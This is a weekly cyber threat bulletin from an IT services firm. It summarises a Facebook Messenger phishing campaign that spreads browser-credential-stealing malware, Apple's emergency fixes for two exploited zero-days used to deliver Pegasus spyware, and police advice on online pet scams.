Welcome to the latest edition of the Cyber Safe Cyber Threats Updates, a weekly series in which we bring attention to the latest cyber attacks, scams, frauds, and malware including Ransomware, to ensure you stay safe online.
Phishing attacks identified targeting Facebook Messenger
A significant cybersecurity threat has emerged with phishing attacks targeting Facebook business accounts through Facebook Messenger. Guardio Labs recently released a report shedding light on this campaign, revealing that hackers are leveraging fake and compromised Facebook accounts to send out millions of phishing messages every week, all intending to infect these accounts with password-stealing malware.
The attackers employ sophisticated tactics, initiating the attack by sending deceptive Messenger messages that impersonate copyright violations or inquiries about products. These messages contain seemingly innocuous attachments concealing malicious content. Once these attachments are opened, a batch file triggers the download of malware from GitHub, designed to avoid detection and maintain persistence on the victim’s system.
The malware itself, coded in Python, employs obfuscation techniques to elude antivirus systems effectively. Its core function is to harvest valuable data from the victim’s web browser, including cookies and login information, which is then transmitted to the attackers. Subsequently, the malware logs victims out of their accounts by wiping cookies, giving hackers the time needed to take control by altering passwords.
This campaign’s sheer scale is a cause for concern, with approximately 100,000 phishing messages sent each week, primarily targeting Facebook users in various regions. Around 7% of all Facebook business accounts have fallen victim to this campaign, with 0.4% downloading the malicious content.
While manual execution is still required for account compromise, the threat remains significant. Guardio Labs also links this campaign to Vietnamese hackers based on indicators found within the malware, including using the “Coc Coc” web browser, which is prevalent in Vietnam. This highlights the ongoing threat posed by Vietnamese threat groups that target Facebook, emphasising the need for businesses to bolster their cybersecurity defences and stay informed about emerging threats.
—-
Apple Releases Emergency Updates to Fix Zero-Day Vulnerabilities
Apple has taken swift action to address two critical zero-day vulnerabilities discovered in iPhones and Macs, bringing the total number of zero-days patched this year to 13. Malicious actors actively exploited these vulnerabilities, prompting Apple to release emergency security updates.
What are the Zero-Day Vulnerabilities?
CVE-2023-41064 (Discovered by Citizen Lab):
This vulnerability is characterised by a buffer overflow weakness.
It is triggered when processing maliciously crafted images.
Exploitation of this vulnerability can lead to arbitrary code execution on unpatched devices.
CVE-2023-41061 (Discovered by Apple):
This vulnerability involves a validation issue.
Attackers can exploit it using malicious attachments.
Like CVE-2023-41064, it can result in arbitrary code execution on targeted devices.
Exploitation Details
Citizen Lab has revealed that these two vulnerabilities, CVE-2023-41064 and CVE-2023-41061, were actively abused as part of a zero-click iMessage exploit chain called “BLASTPASS.” This chain was used to deploy the NSO Group’s Pegasus mercenary spyware onto fully-patched iPhones. The exploit was delivered through PassKit attachments containing malicious images.
Affected Devices
These zero-day vulnerabilities impact a wide range of Apple devices, including:
- iPhone 8 and later
- iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
- Macs running macOS Ventura
- Apple Watch Series 4 and later
Apple’s Response
Apple has promptly addressed these vulnerabilities with security updates in the following versions:
- macOS Ventura 13.5.2
- iOS 16.6.1
- iPadOS 16.6.1
- watchOS 9.6.2
Year of Zero-Day Patches
This marks the 13th zero-day vulnerability patched by Apple this year. The company has been proactive in addressing security flaws actively exploited in attacks against devices running iOS, macOS, iPadOS, and watchOS.
Previous Incidents
Just two months ago, in July, Apple issued out-of-band Rapid Security Response (RSR) updates to fix another vulnerability (CVE-2023-37450) impacting fully patched iPhones, Macs, and iPads. However, these updates partially disrupted web browsing on patched devices, necessitating the release of corrected patches shortly thereafter.
—-
Police urge caution over Online Pet Scams
Greater Manchester has seen a recent surge in pet scams, particularly involving puppy and kitten advertisements on social media platforms. In response to four recorded cases, local police offer crime prevention advice to protect potential buyers from falling victim to fraud.
Scammers typically use popular online selling platforms like Facebook Marketplace and Gumtree to promote pets for sale. Buyers are often lured into paying a deposit without physically meeting the animal, relying solely on online images and videos. Subsequently, scammers request additional payments for expenses like insurance, vaccinations, and even “delivery” to the buyer’s location.
Detective Sergeant Stacey Shannon from GMP’s Economic Crime Unit advises the public to exercise caution, emphasising the importance of viewing the animal in person before making any payments. She encourages buyers to take their time, think critically about the purchase, and avoid rushing into decisions.
To protect against online pet fraud, potential buyers are advised to request in-person or video meetings with sellers, review seller reviews and histories, and be wary of hidden fees. Additionally, using secure payment methods like PayPal or cash for face-to-face transactions is recommended to minimise the risk of scams.
——————————————————————————————————————————
Contact Neuways to help your business become
Cyber Safe
If you need any assistance with cyber security assistance, then please contact Neuways and we will help you where we can. Just get in touch with our team today.
